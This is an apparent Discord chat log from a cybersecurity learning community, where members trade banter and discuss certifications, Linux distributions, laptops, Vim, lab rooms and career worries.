#thm-community-media

1 messages ยท Page 31 of 1

empty sorrel
#

your using linux?

#

Other than kali I am assuming

graceful coral
#

mhm

#

it was my bad, i did something wrong that fucked it up, already fixed it thank you

olive sundial
#

๐Ÿ‘

pale cove
#

Chev is always around when someone mentions burp ๐Ÿ˜†

olive sundial
#

lol

#

i'm nowhere and everywhere at the same time

olive sundial
#

lol

fringe kettle
#

lol

#

looks like a zero ten

pseudo escarp
#

I have two of the top right ๐Ÿถ

olive sundial
graceful coral
graceful coral
#

Ugh updating my CV, hate writing about myself ๐Ÿ˜ฆ

olive sundial
#

you shouldn't lol

#

those are your own achievements and you should be proud of them ^^

graceful coral
#

Oh I am, although I'm just writing my personal statement and I'm like 'Adam is....'

#

sigh

#

HIGH

olive sundial
#

i don't use my name in personal statemnt

graceful coral
#

@

olive sundial
#

i either say Blud or Bruv

#

you can never go wrong with gang gang terminology

graceful coral
#

LOL

#

Bruv so what id is yeah is like I am the shit so hire me yeah get rid of the rest of dis tools.

olive sundial
#

you need to use the sentence I haz experience so gibe mi di jab

graceful coral
#

๐Ÿ‘

past fox
#

@quaint elm I fell asleep, srry

quaint elm
#

It didn't end well anyways.

inner jetty
#

@graceful coral Same here uupdating my cv and I have no clue on how to put the formatting & style together.

open ember
#

anyone notice cloudflare poop itself

proper iris
last marlin
#

Top of the day to you lads

tropic lava
#

Dammit

graceful coral
#

Evening

olive sundial
#

NotLikeThis @regal socket

regal socket
#

gotcha

obsidian dirge
restive tartan
#

^^ amazing

lethal egret
#

That's literally koth in a nut shell

echo marlin
#

@crude agate - VC quickly? Seems weird you cannot find the account

olive sundial
#

if anyone is up for some overwatch tomorrow let me know ^^

graceful coral
#

Hi there. I'm kinda newbie into this stuff of CyberSec. I'm currently doing my bachelors in CyberSec. Is there any specific cert(s) that I can do that is amazing for a beginner and provides hands-on practise and isn't too harsh on the wallet. Thanks in advance.

formal sparrow
#

"Cert" and "Not harsh on the wallet" tend to be mutually exclusive I'm afraid...

#

The CompTIA certs tend to be Ok for price

graceful coral
#

Which CompTIA would you recommend? Security+ or PenTest+?

formal sparrow
#

I am not the right person to ask here, given I don't have either
https://discord.gg/sc3xyH
That's a link into the CompTIA discord server

#

Good place to ask for things like that ๐Ÿ™‚

graceful coral
#

Ok. Thanks mate.

lethal egret
#

Man Fed just had to gift 320 subs to his own chat ๐Ÿ˜‚

graceful coral
#

Is it true that discord is under surveilance?

#

lmfao

#

No fr is it ?

#

now the lmfao looks out of context without the pic you posted

#

those guys were probably messing with you @graceful coral

#

but discord itself may be under surveliance

#

Thats liturally what i just asked ๐Ÿ˜‚

#

they likely will give over their logs if the fbi asks

#

but I don't think you have to worry about discord watching you

#

Discord is watching me omg

graceful coral
#

They'd better not be showing their fbi buddies all my memes and taking credit for them

fringe kettle
#

guys is it a good idea to show your vulnerabilities in a relation ship or does that bite back and your partner tries to exploit it using metasploit

graceful coral
#

haha

#

I find releasing them one bit at a time over the years is better.

#

That way they are locked in ๐Ÿ˜‰

serene venture
#

It's a pickle

#

guys is it a good idea to show your vulnerabilities in a relation ship or does that bite back and your partner tries to exploit it using metasploit
@fringe kettle If they can exploit you, marry them.

olive sundial
#

i can't marry my stepdad :c

serene venture
#

Move somewhere else.

graceful coral
#

Was not expecting that @olive sundial

#

Just spat out my drink.

olive sundial
#

hehehe

#

people say i'm fun at parties

fringe kettle
#

is he hot?

olive sundial
#

my stepdad? not really..

fringe kettle
#

hmmmmm. i say patch your vulnerabilities before another one get exploited

#

I dont think you can afford your data being spread online

olive sundial
#

i do agree, with that

#

but the more i patch

#

the more vulnerabilities i find

#

damn this convo did take a really weird turn

#

plus i don't have a stepdad

#

and he doesn't exploit my vulnerabilities

#

(at least not yet)

fringe kettle
#

lol i love it when conversations get weird

#

you get to experience what you never experienced before

#

hows your uncle by the way

olive sundial
#

Which one lol

#

I got a few

fringe kettle
#

do they still pentest you

tropic lava
#

Pg13.

fringe kettle
#

lol srry

olive sundial
#

Not myself. But the organisation as a whole yes

#

I think we should cut this otherwise I'll get either muted or banned by @tropic lava

fringe kettle
#

yea i agree

#

i really want to make more jokes but i dont want to be muted

#

i have alot of jokes in my head but they are all adult jokes

#

so best not to say them

olive sundial
#

Agreed

fringe kettle
#

ninja vent im a good boy i swear

#

damn i cant type today

olive sundial
#

You got a cat dude

#

No one can trust cats

fringe kettle
#

lol

#

true

#

but its half human

#

have you seen its face

olive sundial
#

Change it to a good boi

#

I did

graceful coral
#

I want a cat ๐Ÿ˜ฆ

olive sundial
#

Reminds me of chernobyl

fringe kettle
#

lol @olive sundial

graceful coral
#

I'd call my cat Mr Cat

fringe kettle
#

@graceful coral its been settled im your cat

olive sundial
#

Here

#

Vote for your favourite catname

fringe kettle
#

can i nominate my name

#

my original name was nut------ but i was told by the admin to change it to netbuster

olive sundial
#

Go ahead. Not sure how it works to be fair

graceful coral
#

oh dear

olive sundial
#

Yeah, welp

fringe kettle
#

yea i feel bad

#

its almost as my rights are taken away

graceful coral
#

haha

#

I was always a fan of Deadmau5's cat name Meowingtons

#

You could also have these though:

#

Cat Stevens.
Ali Cat.
Cat Benatar.
Cindy Clawford.
Meowly Cyrus.
Oprah Whisker.
Pawdry Hepburn.
Fleas Witherspoon.

#

What do you think @olive sundial

olive sundial
#

Pawdy Hepburn works just fine ๐Ÿ˜„

graceful coral
#

I'm a fan of Oprah Whisker and Fleas Witherspoon.

quaint elm
#

I'd call my cat Mr Cat
@graceful coral I remember there was a cartoon show named Kid Vs Kat, where the protagonist sister named her cat as Mr. Cat.

graceful coral
#

[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344354 to do in 5433:29h, 4 active - it's going to be a long few days ๐Ÿ™‚

heady fable
#

Oh my

graceful coral
#

Every time it outputs a status message the time goes up too.

heady fable
#

D:

graceful coral
#

Think I'm barking up the wrong tree.

heady fable
#

Quite possibly...

#

Entertaining stream content: A graph and terminal parrot xD

graceful coral
#

ha

heady fable
#

I've got a surprise lined up for optional aswell when he next appears

graceful coral
#

Sounds a bit ominous..

heady fable
#

Unfortunately it's nothing exciting, he just gave me a script idea so I threw it together

lethal egret
#

I swear if itโ€™s the file system spammer

heady fable
#

๐Ÿ™‚

last marlin
#

Hey lads

graceful coral
#

Evening

last marlin
#

What you guys think of fish shell ?

graceful coral
#

what ive been longing for

#

What cursed thing have you brought upon this land?

#

I'm beginning to understand why you have the 'nick' you do now @graceful coral

#

What a chuff have you been watching..

#

Think that's a good sign for me to log off for the night
@graceful coral enjoy I guess?

last marlin
#

lol

graceful coral
#

Haha

last marlin
#

What cursed thing have you brought upon this land?
@graceful coral well said ๐Ÿ™‚

olive sundial
#

Don't mess with my Frenchie

#

You know you are tired when you scan your own webserver for xss

graceful coral
#

lol

#

@olive sundial kek

#

You're usually awake when I'm on in like 8 hours

#

Get to bed

olive sundial
#

yeah, i got work

#

i'm doing eJPT

#

@graceful coral ^

graceful coral
#

Oh nice

#

@olive sundial I believe in you!

olive sundial
#

nailed half of it

#

for once @strange axle s blue room pays off

graceful coral
#

oh dang really

olive sundial
#

yes

#

appreciate it though ^^

strange axle
fierce oyster
#

test

graceful coral
#

@olive sundial who is your frenchi

outer vale
#

@lethal egret needs a bird person emote

olive sundial
#

U :( @graceful coral

last marlin
#

Top of the morning to ya lads

#

Almost weekend babe

#

I can almost smell it

oblique maple
#

hi

#

been off sick, and loving the site joined 6 days ago ๐Ÿ™‚

#

looking forward to learning loads here

formal sparrow
#

Welcome ๐Ÿ‘‹

strong crown
graceful coral
#

Ouch!

graceful coral
#

OH NO

#

Ok thank god

#

Macro stuff is due Sunday at midnight

#

My history is due tonight at midnight

olive sundial
#

that is very fast

graceful coral
#

Reminds me of back when I installed Gentoo

#

I was downloading in litteral bytes per second

olive sundial
#

not sure what gentoo is

#

lol

graceful coral
#

Linux distro

last marlin
#

hello lads

tidal hemlock
#

does anyone know any good blue team labs
even in other sites I cant find anything blue
except reverse enginnering

tropic lava
echo marlin
#
#

Come along

last marlin
#

Any vim fans awake ?

formal sparrow
#

VIM!!!!

last marlin
#

Found out how to copy 2 lines, now im puzzled with cutting 2 line

formal sparrow
#

Does vimtutor help?

#

Or man vim

#

Or the vim help pages

#

Or Google?

last marlin
#

FYI. i never ask here a question before wasting 30-60 min on google ๐Ÿ˜„

#

sometimes due to too much of inf i get confused

#

done.. i really wasted more than 1.5 hour on this 2 questions.. maybe cuz its too late of the night ๐Ÿ™‚

#

only by narrowing down google search i could find the answers

formal sparrow
#

All information can be found if you look hard enough ๐Ÿ™‚

last marlin
#

finished Vim room.. conclusion ? never gonna use it ๐Ÿ˜„

formal sparrow
#

Nah, Vim is beautiful

#

Best text editor you're ever going to find

last marlin
#

so i heard

formal sparrow
#

(Great for Koth too)

#

(ain't it @graceful coral...)

last marlin
#

but I find it very brain*******

formal sparrow
#

So did Pars

#

When I trapped him in it for five minutes

last marlin
#

๐Ÿ˜„

#

never say never

formal sparrow
#

Seriously

#

Vim is wonderful

#

When you use it properly it speeds everything up so much

last marlin
#

installed fish shell last night.. so loving it

#

especialy when it highlights history

graceful coral
#

Don't take credit for my stupidity @formal sparrow

#

You didn't trap me in vim, I trapped myself

formal sparrow
#

๐Ÿ˜›

echo marlin
#

๐Ÿ˜‚

last marlin
#

is it a bad habit to use -A with nmap ?

formal sparrow
#

It's loud

last marlin
#

in other words, if i would scan a normal website i would get blocked real fast ?

formal sparrow
#

Depends on the security of the website

#

Either way it isn't recommended

hexed thicket
#

Guys, quick question

#

Does anyone have a braille to english OCR tool?

#

Asking for a friend

last marlin
#

up to this moment i had no idea what breaille is, so I dont know

formal sparrow
#

Assuming it's not that easy..

hexed thicket
#

I tried that, looks like a person project and isn't really designed for use outside theirs

#

You'd be surprised, I found nothing except a few small projects I couldn't get to work

formal sparrow
#

Odd. Well, I got nothing then ๐Ÿคทโ€โ™‚๏ธ
You're the Python expert around here I'm afraid -- if you're lucky someone might have something though

hexed thicket
#

Well thanks lol

#

worth a shot

last marlin
#

joker room is Powered by Hacking Articles ? ๐Ÿ˜„

#

I really like that site.. so much good info on it

#

lol got new level, and im still wizard..

#

so not funny

#

I was supose to be master by now

graceful coral
#

hey, does anyone know where I could find information about how nation states (i'm researching the iranian government specifically) can just hack facebook accounts. Like what are the advantages that an government might have over just rouge malefactors

#

Personally I'd say Google would be your best bet.

#

I realise that's probably not the answer you're looking for however that's likely where you will get the most information.

#

I'd also look up Edward Snowden as he mentioned a lot about 'collection programs' although I don't believe it was specifically on Iran.

#

More so the US population.

graceful coral
#

@nova lynx psst you awake

#

@graceful coral psst you awake

patent rain
#

noot

graceful coral
#

@graceful coral Advantage is far more money and time and a more focused talent pool. They don't just do an attack they do a campaign on their targets. Any way is a way in.

#

@graceful coral Add me to your profile nootings

#

yeah, the government is gonna have much more resources than your average pentester/pentest group

#

also will hold on to any 0days they find for future use

#

They would also have leverage to straight up ask the corporation for certain details

#

rather than report to bug bounties

#

or otherwise disclose it in any way

#

they have more to benefit by keeping it quiet. Rogue groups rarely can afford that luxury

#

iranian government becomes number one on hackerone

#

LOL

#

"Hey guys we're dissolving the team"

#

"Heres all the 0 days we found though..."

last marlin
#

Why ? I mean why are they so interested in Iran ?

graceful coral
#

whos they

#

the guy that asked

#

@graceful coral

#

ah

#

I am tired and unable to keep the same train of thought for more than 15 seconds

last marlin
#

the guy that asked
@graceful coral That guy, and the site you mentioned hackerone(cuz you said it becomes nr one on their list )

graceful coral
#

oh, just thinking of doing an essay on it

graceful coral
#

Then I would suggest if you haven't already that you watch the film Snowden as that will certainly open your eyes in terms of what a powerful government can do.

olive sundial
#

Who pinged me 4 times then deleted the message?

graceful coral
#

Not it

#

But hello Chev

olive sundial
#

Heyo pars

tidal hemlock
#

@tropic lava I did, no one answered me, I even said hi and no one said hi back ๐Ÿ˜ฆ

graceful coral
#

@tidal hemlock hi

tidal hemlock
#

hello ur the only sane person in this server

tame ledge
#

@tidal hemlock Hi

tidal hemlock
#

hello ๐Ÿ˜Š

pale cove
#

Hi!

tidal hemlock
#

hello

olive sundial
#

๐Ÿฐ โฒ๏ธ ?

serene venture
#

๐Ÿฅฎ

tame ledge
#

๐Ÿฐ ๐Ÿฐ

nova lynx
#

@nova lynx psst you awake
@graceful coral now I am

graceful coral
#

lol

graceful coral
#

@nova lynx permission to DM

nova lynx
#

@graceful coral of course

#

any time โค๏ธ

formal sparrow
#

@tropic lava -- if and when you get a moment, fancy talking Thinkpads?

tropic lava
#

๐Ÿค”

#

New or old?

formal sparrow
#

As a really preliminary thing, I was looking at a new T495s

#

Not least because they seem to play nice with Linux

#

I seem to remember you saying that some older ones could be really nice though?

tropic lava
#

The Ryzen ones are pretty nice

#

wait I could buy a laptop because I'm not paying rent anymore

formal sparrow
#

Haha

#

Yeah, I'm thinking Ryzen 7 Pro 3700U

#

Pars is pushing to wait for the ROG Zephyrus G14, which honestly looks absolutely awesome

#

Preliminary reports are that it does not play nice with Linux though

tropic lava
#

But yeah wait for Ryzen 4000 mobile

#

It's Zen 2 (Desktop 3000) based so great single core gains

formal sparrow
#

It sounds really good. Literally my only qualm with something like the Zephyrus is potentially being stuck on Windows

#

Not sure I could cope with that for a daily driver

#

I'll wait a while, I think, and assess it in August maybe, when they've been out for a while

#

Did you say you recommended some older ThinkPads?

tropic lava
#

They're cheap

#

Depends what you're gonna do with it

formal sparrow
#

Tinkering, mainly. I fancy picking up something older that's nice and upgrade-able. Might be better going for something new as a daily driver though ๐Ÿคทโ€โ™‚๏ธ

#

Mainly asking because I seem to remember that's what you're using?

hushed saddle
graceful coral
#

Pars is pushing to wait for the ROG Zephyrus G14, which honestly looks absolutely awesome
@formal sparrow Looks sexy as hell!

formal sparrow
#

It looks absolutely gorgeous

#

And those specs, oof

#

Literally my only qualm is that it really doesn't seem to like Linux

graceful coral
#

It's not Ryzen but have you considered a Dell XPS laptop, I've just ordered one to work from home with and they are handy little things.

formal sparrow
#

Even if you bully it into working, the battery life seems to go down to two hours

#

I have not

#

Currently on an older Dell Inspiron

#

Absolutely love the thing to bits

#

Think it's time for an upgrade though

#

It's very nearly 8

graceful coral
#

Oh wow.

#

Why don't you get the ROG and just run a VM on it.

#

It's not ideal I know but..

formal sparrow
#

Specs were good enough back then that it's still more than manageable now, and I do love the thing. Just starting to get problems

#

That would be because I really dislike Windows as a daily driver

#

It's unwieldy

graceful coral
#

Ah.. ๐Ÿ˜ฆ

formal sparrow
#

My Desktop runs it, mainly because it's a powerhouse that I don't do any real technical work on

#

I use it for VMs, very occasionally games, and watching films if I ever get the time

#

Plus things like photoshop or video editing

#

Anything actually to do with computing I use my laptop

#

Wouldn't have that option if both were on Windows

graceful coral
#

Don't know what to suggest then ๐Ÿ˜’

formal sparrow
#

I'm going to try finding something that's powerful and works nicely with my beloved Linux

#

That T495 seems to do the trick, especially using something like Arch

#

If the Zephyrus starts working better when the updates start coming out

#

Well, that'll be at the top of the list

#

It's such a gorgeous machine

tropic lava
#

@formal sparrow someone just told me I can use git and LaTeX and this is what I need in my life.

#

Why didn't I know this before?

hallow hound
#

Love LaTeX. Saved me so much time in grad school lol

crude agate
#

Oof

#

If you're using latex, overleaf is the best thing

last marlin
#

did some1 say Ryzen ? ๐Ÿ˜„

#

Love LaTeX. Saved me so much time in grad school lol
@hallow hound Latex and school.. what have they in common ?

pale cove
#

a lot

#

I used to use Latex in school too

hallow hound
#

@last marlin I had to type a lot of quantum equations for my thesis. Doing it on Word was a pain in the ass.

last marlin
#

Ow you mean sofware ? ๐Ÿ˜„ I thought we were talking about latex , that you can wear ๐Ÿ˜„

hallow hound
#

OHHH hahahah

last marlin
#

๐Ÿ˜„

hallow hound
#

HAHA that's so funny. kekw

last marlin
#

HAHA that's so funny. kekw
@hallow hound sorry my mind must be in the wrong place after weekend ๐Ÿ˜„

hallow hound
#

It's all good, bud. ๐Ÿ™‚ Hope it was nice, being in quarantine and all.

last marlin
#

It's all good, bud. ๐Ÿ™‚ Hope it was nice, being in quarantine and all.
@hallow hound ofc there are no clubs open, but hier in Holland, we dont have to sit at home.. you see a lot of ppl in park picnicking under the sun.. ofc gov advices to not leave your home without a good reason, but nothing stops you to go outside and have some good time

hallow hound
#

@last marlin Holland! So cool. I'm in California right now. I think people are very stir crazy and starting to leave the house too. Notice a lot of traffic today when I went to the market.

last marlin
#

@last marlin Holland! So cool. I'm in California right now. I think people are very stir crazy and starting to leave the house too. Notice a lot of traffic today when I went to the market.
@hallow hound its not easy to stay at home all the time.. im not much of an outside guy, but still, sometimes you want to go outside, especialy with this nice weather

hallow hound
#

@last marlin Hehe. I've been to the Netherlands twice in March and... Denmark once for the summer. I was lucky enough to experience nice weather. Although, I think it was very windy at one point while I was camping on the beach. People should be able to leave just a little bit, as long as they practice the six-foot rule.

last marlin
#

@hallow hound Wind is a part of Netherlands.. I'm livinf in rotterdam so we have a huge river in the city called "Maas" so wind is every day thing for me ๐Ÿ˜„

#

and rain t oo

#

it can rain up to 5 times in a day here and still have a sunny day at the end ๐Ÿ™‚

hallow hound
#

@last marlin Oh my goodness. I mean. We can average out the weather between our locations and get a happy medium. Californians have drought, you know.

winter thunder
#

hey guys i need some advice

hallow hound
#

hehe. ask away. I'm kind of a n00b, maybe our boy @last marlin can help :x

last marlin
#

@last marlin Oh my goodness. I mean. We can average out the weather between our locations and get a happy medium. Californians have drought, you know.
@hallow hound never been in US..

#

hey guys i need some advice
@winter thunder im not sure i can help, but ask away.

hallow hound
#

@last marlin Well if you like nice weather, come on over! If you like surfing, SoCal has a whole bunch of spots.

last marlin
#

@last marlin Well if you like nice weather, come on over! If you like surfing, SoCal has a whole bunch of spots.
@hallow hound I doubt it will be this year.. I have a mission for this year, to get OSCP cert. will be doing a lot of study.

#

Hope im not shooting for the stars when i say this year ๐Ÿ™‚ I know its not an easy thig to get

hallow hound
#

@last marlin Understood ๐Ÿ™‚ Good luck on that. I believe in you!

#

PFt. I'd fail it for sure.

#

Tbh, cyber is probably one of the toughest subjects for me. Chemistry is less complicated compared to cyber x_x

winter thunder
#

im a 23 year old college student doing a degree. Informatics and Security is the name of my degree but my program's structure is a mess. I have failed some courses in this program before so I had to wait a year to take it again. Some of my profs are nice but most are not good at teaching some dont even teach. Since the program is a degree I know that there is high expectations from the students. but for someone like me who didn't have a good foundation in IT, i find it hard to catch up. I really like this field but because of my situation and experiences at the college made me feel depressed and not motivated. What should I do?

last marlin
hallow hound
#

@winter thunder I'm going to message you privately ๐Ÿ™‚ But you answered a very important question. You like your degree and that's the most important thing.

last marlin
#

im a 23 year old college student doing a degree. Informatics and Security is the name of my degree but my program's structure is a mess. I have failed some courses in this program before so I had to wait a year to take it again. Some of my profs are nice but most are not good at teaching some dont even teach. Since the program is a degree I know that there is high expectations from the students. but for someone like me who didn't have a good foundation in IT, i find it hard to catch up. I really like this field but because of my situation and experiences at the college made me feel depressed and not motivated. What should I do?
@winter thunder This is a topic you must discuse with your father maybe, you are asking life advice, i wouldnt dare to advice someone to give a life advice, but one thing for sure, i have drop from study long time ago, and i regret it deeply, so my only advice is, finish what you started and try keeping up the things you love, im currently working 9 h a day, i sleep for 4 hours and the rest of the day i try to dedicate to a study.

graceful coral
#

@winter thunder Hey man. I'm going to not give any real advice but I can give my personal experience. I left college after two years to take a job doing infrastructure/helpdesk. I did it for two years before I was recently offered a security engineer position. I don't regret taking the job but I do regret stopping my degree when I only had 2 years on it left. It's worked out for me but only due to hard work. To get to where I am I had to go way above and beyond the scope of my job and learning to automate things while implementing systems all while on an apprenticeship getting paid the same amount as when I worked in a grocery store.
My evenings are spent studying for a degree, volunteering for a cyber security charity and learning whatever I can on THM and other platforms. Personally I wish I had finished my degree while I had the time. I'll still get a degree but it will take me 4 years now.
@last marlin Agreed about the life advice thing, I'm not going to weigh in on that either, just giving my experience on the subject

last marlin
#

well said ma man @graceful coral

graceful coral
#

@hallow hound California is on me and my partners list of places to visit but it won't be for a few years due to other trips lol

last marlin
#

@graceful coral have you done room Game Zone ?

winter thunder
#

Thank you guys. i shall find my path soon

graceful coral
#

Iโ€™ve not done that one unfortunately, might take a look later

last marlin
#

Iโ€™ve not done that one unfortunately, might take a look later
@graceful coral its an easy one, but damn, that last question is hunting me.. cant seem to figure out what payload to choose, you would think thats an easy one, but whatever i choose i get en error

last marlin
olive sundial
#

CISSP?

#

that's more for people that are interested in management

#

and CIO

#

so if you want to move away from hands on stuff this is the cert for you

last marlin
#

I was wondering, what course could i take before trying for OSCP

olive sundial
#

a lot of them, lol

#

try elearn security

#

i might go for the next level in a month or so

quaint elm
#

Isn't CISSP require 5+ years of IT experience?

last marlin
#

Isn't CISSP require 5+ years of IT experience?
@quaint elm no idea

olive sundial
#

That too

#

But it's management focused certification

last marlin
#

got some toy for myself, Ryzen will have to wait

proper iris
#

@quaint elm Certifications say you should have a certain number of years or other set of skills to be comfortable with a certification.

With the CISSP, they have particularly strict rules. It's a certification geared towards experienced cybersec folks with real experience in several different operational fields. In order to confirm this you need to undergo a validation/endorsement process. they have all the details on the website.

You can take the certification exam but in order to be fully certified you need to be validated. You also have to pay an annual maintenance fee and regularly show that you are taking further training/certification by undergoing courses/exams at registered organisations like Cybrary, Offensive Security and others.

https://www.isc2.org/Certifications/CISSP

The CISSP is ideal for experienced security practitioners, managers and executives interested in proving their knowledge across a wide array of cybersecurity practices.

full vine
#

Has anyone had jobs in this field? I'm coming from a web developer into infosec. I'm wondering the differences. For example, a junior level developer could perhaps build a simple, static website. A senior, though, could build the backend, link it with a database, implement authentication, etc.

#

So, is there a junior/mid/senior level in this area? What are they supposed to know(at the levels)?

#

Not that I'm interested in a job. I'm just curious.

tropic lava
graceful coral
#

huh?

heavy flame
#

damn these made me cry ๐Ÿ˜ข

graceful coral
tame ledge
#

๐Ÿฐ ๐Ÿฐ

olive sundial
#

๐Ÿฅฎ

#

๐Ÿง

tidal hemlock
#

@winter thunder I have graduated from colleges in the same situations you have experienced with really bad professors that dont care

quaint elm
#

It's alright, I think as I am in a similar situation, it doesn't matter how they treat you if you treat yourself right then it really doesn't matter how other responds to. If you really do love infosec, give it your all, make sure it worth in the end.

tidal hemlock
#

dude its not about how i was treated

#

@quaint elm its about the money i paid

#

and didnt really learn anything new

#

If i new better I would have just taken certs

#

instead

quaint elm
#

Well, is it going to come back?

tidal hemlock
#

๐Ÿ˜ข

#

Oh god all that money wasted

#

I owe 22 thousand dollars

#

as a result of this

quaint elm
#

Exactly, that's what I am saying. Thinking about it will only make you feel frustrated.

#

You owe $22K -_-

tidal hemlock
#

yea

#

And i cant get a job entry jobs and internship is not alot in my state

#

now im sitting in my moms basement

#

thinking about working minimum wage

#

or opening a business online

#

with free hosting

#

and i am also learned how to make android apps and investing in that

#

making apps for googleplay with too much ads

#

and i also learned*

#

damn i cant type when im in emotional distress

olive sundial
#

if it makes you feel better in UK universities costs way more, it's around ยฃ10k a year depending on the uni and what you are studying

#

well, try getting the most experience you can for now then think about what else to do in the future

#

if you have a goal well defined, no matter how hard it is to achieve it, you will eventually get it

#

i was in doubt a few months ago if security is what exactly i wanted, but then went straight on learning and now i am very certain about it.

#

everything can be disappointing at one point or another. but the only thing that makes it worse is yourself. you put it hard on yourself. knowing it's not your fault. What i do in these cases: make the best you can out of the worst situations

graceful coral
#

UK does have a lot of programmes to get a degree without paying though. It might just be Scotland but here the government will pay for a 4 year degree. Lots of people still take out loans but it can be done without it. There's the graduate apprenticeship program too which is fully funded by the goverment and you get a degree out of it

ornate crag
#

Hey not sure if this here or not.

I just started the Nessus room and it suggests creating an Ubuntu box just for Nessus scans.

Just wanted to find out before I carry on as to why this is.

Is this not something I should have on my Kali VM?

olive sundial
#

Level 4 apprenticeship in UK sucks big time.

#

Level 5 and 6 are good though

#

The level 4 is with BCS which are a pile of humpty dumpty that don't know anything about security and trust my word on that.

graceful coral
#

Graduate level apprenticeship you go to uni and stuff while still working and get a degree after 4 years
A lot of the programmes are quite good
Getting a degree with it through open uni at the moment and it's not too bad. I've not really learned much but I really only want the degree

#

Plus most of the benefit from an apprenticeship is the on the job experience you get

olive sundial
#

Same. I am doing both an apprenticeship, uni and working full time

#

But level 4 is just bad lol

graceful coral
#

Are you in england? Not sure the numbering system translates which is confusing me a bit.
As I did a regular apprenticeship and my coursework was level 6
then there's a level 8
and the level 10 is a graduate apprenticeship which gets you a bachelors degree

olive sundial
#

hmm i am not certain about that lool

#

yes, i'm in england

graceful coral
#

Must be a different system lmao

olive sundial
#

it is haha

graceful coral
#

Yeah sounds like Scotland are doing wacky things. When I did my regular apprenticeship I did the coursework in 3 weeks

formal iron
pale cove
pseudo escarp
#

Lmao

pale cove
#

it's pretty obvious

#

there are a lot of people who use the same password everywhere :)

mellow torrent
#

This is why people should use already trusted communication severs like discord

pale cove
#

i doubt that teachers would use discord ๐Ÿ˜†

arctic imp
#

just a quick question, Whats the best os to daily drive, windows, linux or mac...im struggling to stick with on because i like aspects of all 3 - what do you folks use

tropic lava
#

"best" is subjective

pale cove
#

highly depends on your daily routine

tropic lava
#

I daily windows because I game. For productivity, I use Xubuntu.

pale cove
#

i use linux everywhere because it's fast and light

#

imagine gaming

graceful coral
#

have anyone tried โ€œowasp webgoatโ€? I am searching for similar VM ..... explanation and practice included like this web goat .....(not searching any paid lab).... but i canโ€™t find..... anyone have any suggestions?

last marlin
#

Kali, all day every day..

pale cove
#

Parrot > Kali

#

parrot > kali

tame ledge
#

Arch > *

last marlin
#

Parrot > Kali
@pale cove Why ? cuz Parrot is lightweightโ€Š ?

#

I have pretty good machine, so im not looking for lightweight

#

maybe its a better option for older PC's

tropic lava
#

Parrot is less light than kali, surely?

last marlin
#

im not sure

#

I know kali on my machine feels like lightweight

arctic imp
#

i like kali, so many forums say you cant use it daily..

tame ledge
#

Kali is a pentesting distro, it is not a daily driver.

last marlin
#

i like kali, so many forums say you cant use it daily..
@arctic imp Well, im using it day and night

#

the only time it failed on me when i accidently removed gir1 lib

#

Btw any of you have linux loading via UEFI >? I do not have win on my machine, so i feel like i dont need grub

olive sundial
#

i did dual boot with secure boot

#

a damn hassle to make secure boot kali

arctic imp
#

i tried ubuntu but my graphics card made it so laggy, recently ubuntu doesn't seem to like NVidia cards..

olive sundial
#

but everytime i opened up spotify on my windows boot

#

it was glitching my screen

last marlin
#

Kali Linux โ€”
Graphical Acceleration Required.
Minimum 1GB RAM is required.
Minimum 1GHZ dual-core CPU is required.
It can boot in legacy and UEFI modes as well.
At least 20GB of hard disk space is required to install the operating system.

#

so it is possible, but have no exp in that area..

#

not sure should i do it or not

olive sundial
#

it's not hard to install

last marlin
#

I would like to do it withou reinstalling my system

pale cove
#

@pale cove Why ? cuz Parrot is lightweightโ€Š ?
@last marlin

  1. Parrot is way more stable
  2. Has wider range of pre-installed tools
  3. Wonderful "Home" edition
  4. Always had non-root user by default
last marlin
#

@last marlin

  1. Parrot is way more stable
  2. Has wider range of pre-installed tools
  3. Wonderful "Home" edition
  4. Always had non-root user by default
    @pale cove it is hard for me to believe that kali is not stable.. i maybe we understand word stable diffrently. anyways. I'll stick to Kali for now, But wont say no to Parrot if you are advicing it.
#

another Question, what will happen if I delete grub ? ๐Ÿ˜„

#

I have notice loading via bios, I didnt see grub.. so does it mean if i delete grub that it will just load via UEFI ?

cobalt thicket
#

You either need to keep grub or switch your bootloader to something like rEFInd, other wise your pc doesn't know what to boot

last marlin
#

You either need to keep grub or switch your bootloader to something like rEFInd, other wise your pc doesn't know what to boot
@cobalt thicket any chance to avoid seeing this ? and make linux just load after bios ?

#

I have set the timer to 0, but still i see it loads for a sec

#

but when i go to bios and choose boot kali, I dont see this blue screen

graceful coral
#

what about backBox?

#

just found this distro

pale cove
#

hmm i've seen blackBox many times on different forums and it's kinda rated top #3 distro for pentesting

#

Kali is #1 and Parrot is #2

urban crescent
#

Backbox is a nice slim distro

#

definitely missing some key tools

#

but it doesn't scream PeNtEsTiNg

graceful coral
#

Having used all 3 I have to agree with @pale cove for me it's Kali, Parrot then Backbox.

arctic imp
#

well i have to say im new to this, ive built websites for years but not really felt satisfied, but this has been really good so far

graceful coral
#

Glad to hear it @arctic imp

graceful coral
#

Hey can someone recommend cheap a NIC with Monitor and Injection mode?

rustic moss
#

alfa has got some good products

#

they arent too too expensive either

graceful coral
#

Future community mentor^

native wren
#

ummm guys, anyone can help me on ls stuff ?

#

while i cant cd .. to back parent directory?

quaint elm
#

Try python -c 'import pty; pty.spawn("/bin/sh")'

native wren
#

already,

#

didn't work on

tropic lava
#

@native wren do it all in one command

#

cd ../ && cat flag

#

For example

native wren
#

@tropic lava cd ../ <-- for what? sorry i dont know for that command...

tropic lava
#

You don't know CD?

native wren
#

change directory

#

yea ik

tropic lava
#

Basically

native wren
#

but ../ <--- first time i saw

tropic lava
#

../ = ..

#

Just notation is slightly different, makes it more clear it's a directory

native wren
#

ah i see

#

thanks for the infomation

graceful coral
#

. = current directory

#

.. = previous directory

#

noots on optional

muted bramble
#

So who here makes a living of hacking?

#

๐Ÿ™‚

#

Iโ€™m working to finish OSCP certificate and want to know if that is a good start to find work or I have to do maybe other certs?

slender gulch
#

@muted bramble Although certifications do stick out alot more than a degree from college, employers also really want to see experience as well. You could certainly do OSCP as your first cert but that may be a bit much if you are just starting off. If its your first security cert, I recommend Security+, GSEC, etc.. I personally got my certified ethical hacker prior to OSCP but that was back yonder as I am CISSP-ISSEP now. it all boils down to what you are specifically wanting to do in a job. Do you have previous work history in IT or security?

steep scroll
#

ummm guys, anyone can help me on ls stuff ?
@native wren ../ is the simbolic path to the parent directory lad

#

@slender gulch oh hey you're here man

#

Codecademy got a good course on UNIX command

slender gulch
#

@steep scroll

steep scroll
#

bruh

cobalt thicket
#

Get the piece of paper that the jobs in your area need

slender gulch
#

